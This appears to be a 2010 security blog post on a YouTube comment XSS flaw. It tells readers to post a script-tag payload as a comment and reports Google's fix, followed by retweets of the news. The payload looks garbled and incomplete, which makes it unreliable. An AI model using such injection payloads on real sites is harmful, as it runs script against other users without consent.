Cross-site scripting on YouTube
XSS vulnerability in YouTube comments processing allows an attacker to execute arbitrary scripts in the security context.
Go on youtube. Choose any video. Add the following script:
[php]<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>[/php]
Update (1): It is better to stay away from YouTube until they fix the vulnerability or at least logging out of YouTube if you use it.
Update (2): Google has informed that the vulnerability has now been fixed:
We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.
you can find the statement here.
make sure you subscribe to my RSS feed!
[…] This post was mentioned on Twitter by Lance Miller, Mourad ben lakhoua and others. Mourad ben lakhoua said: Cross-site scripting on YouTube http://www.sectechno.com/2010/07/04/cross-site-scripting-on-youtube/ http://fb.me/xfnuNsdx […]
RT @Hfuhs: Cross-site scripting on YouTube fixed – http://fuhs.eu/1uk
Cross-site scripting on YouTube fixed – http://fuhs.eu/1uk
RT @MBenLakhoua Google has informed that youtube XSS vulnerability has now been fixed http://bit.ly/bw5y5s
RT @MBenLakhoua Cross-site scripting on YouTube:
XSS vulnerability in YouTube comments processing allows an… http://bit.ly/cqqr3K
RT @silvakreuz: #Google has informed that #YouTube #XSS #vulnerability has now been fixed http://bit.ly/bw5y5s (via RT @paperghost @MBen …
RT: @klightowler: Google fixes cross-site scripting vulnerability on youtube.com http://bit.ly/9RZEwA < 4chan were having a field day
Google fixes cross-site scripting (XSS) vulnerability on youtube.com http://bit.ly/9RZEwA
#Google has informed that #YouTube #XSS #vulnerability has now been fixed http://bit.ly/bw5y5s (via RT @paperghost @MBenLakhoua)
RT @sectechno: Google has informed that youtube XSS vulnerability has now been fixed http://bit.ly/bw5y5s